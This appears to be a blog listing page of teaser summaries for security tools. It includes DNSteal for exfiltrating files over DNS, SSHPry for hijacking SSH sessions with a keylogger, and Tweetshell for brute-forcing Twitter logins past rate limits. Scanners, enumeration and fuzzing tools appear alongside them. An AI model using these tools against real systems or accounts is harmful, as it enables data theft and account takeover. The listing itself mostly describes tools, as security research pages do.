DNSteal v2.0 – DNS Exfiltration Tool For Stealthily Sending Files Over DNS Requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.Below are a couple of different images showing examples of multiple file transfer and single verbose file transfer: Support for multiple files Gzip compression supported Now supports the customisation of subdomains and bytes per subdomain andRead More

Angrgdb – Use Angr Inside GDB – Create An Angr State From The Current Debugger State

Use angr inside GDB. Create an angr state from the current debugger state. Install pip install angrgdbecho “python import angrgdb.commands” >> ~/.gdbinit Usageangrgdb implements the angrdbg API in GDB.You can use it in scripts like this: from angrgdb import *gdb.execute(“b *0x004005f9”)gdb.execute(“r aaaaaaaa”)sm = StateManager()sm.sim(sm[“rax”], 100)m = sm.simulation_manager()m.explore(find=0x00400607, avoid=0x00400613)sm.to_dbg(m.found[0]) #write input to GDBgdb.execute(“x/s $rax”)#0x7fffffffe768: “ais3{I_tak3_g00d_n0t3s}”gdb.execute(“c”)#Correct! thatRead More

SSHPry v2.0 – Spy and Control os SSH Connected client’s TTY

This is a second release of SSHPry tool, with multiple features added. Control of target’s TTY Built-In Keylogger Console-Level phishing Record & Replay previous sessions Demo Blogpost: http://www.korznikov.com/2017/09/sshpry-v2-spy-control-ssh-connected.htmlTwitter: @nopernik Howto./sshpry2.py Files:sshpry2.py – the toolEverything else parts of code used in the tool (does not depends on them) Download SSHPry2.0

HikPwn – A Simple Scanner For Hikvision Devices

[*] HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. This project was born out of curiosity while I was capturing and watching network traffic generated by some of Hikvision’s software and devices.Setup instructions: git clone https://github.com/4n4nk3/HikPwn.gitcd HikPwnpip install -r requirements.txt Tested on: Python 3.8 on Linux 4.19Read More

Sandcastle – A Python Script For AWS S3 Bucket Enumeration

[*] Inspired by a conversation with Instacart’s @nickelser on HackerOne, I’ve optimised and published Sandcastle – a Python script for AWS S3 bucket enumeration, formerly known as bucketCrawler.The script takes a target’s name as the stem argument (e.g. shopify) and iterates through a file of bucket name permutations, such as the ones below: -training-bucket-dev-attachments-photos-elasticsearch[…] GettingRead More

Tweetshell – Multi-thread Twitter BruteForcer In Shell Script

Tweetshell is an Shell Script to perform multi-threaded brute force attack against Twitter, this script can bypass login limiting and it can test infinite number of passwords with a rate of +400 passwords/min using 20 threads.Legal disclaimer:Usage of TweetShell for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obeyRead More

Jackdaw – Tool To Collect All Information In Your Domain And Show You Nice Graphs

Jackdaw is here to collect all information in your domain, store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reportingRead More

Frida API Fuzzer – This Experimetal Fuzzer Is Meant To Be Used For API In-Memory Fuzzing

This experimental fuzzer is meant to be used for API in-memory fuzzing.The design is highly inspired and based on AFL/AFL++.ATM the mutator is quite simple, just the AFL’s havoc and splice stages.I tested only the examples under tests/, this is a WIP project but is known to works at least on GNU/Linux x86_64 and AndroidRead More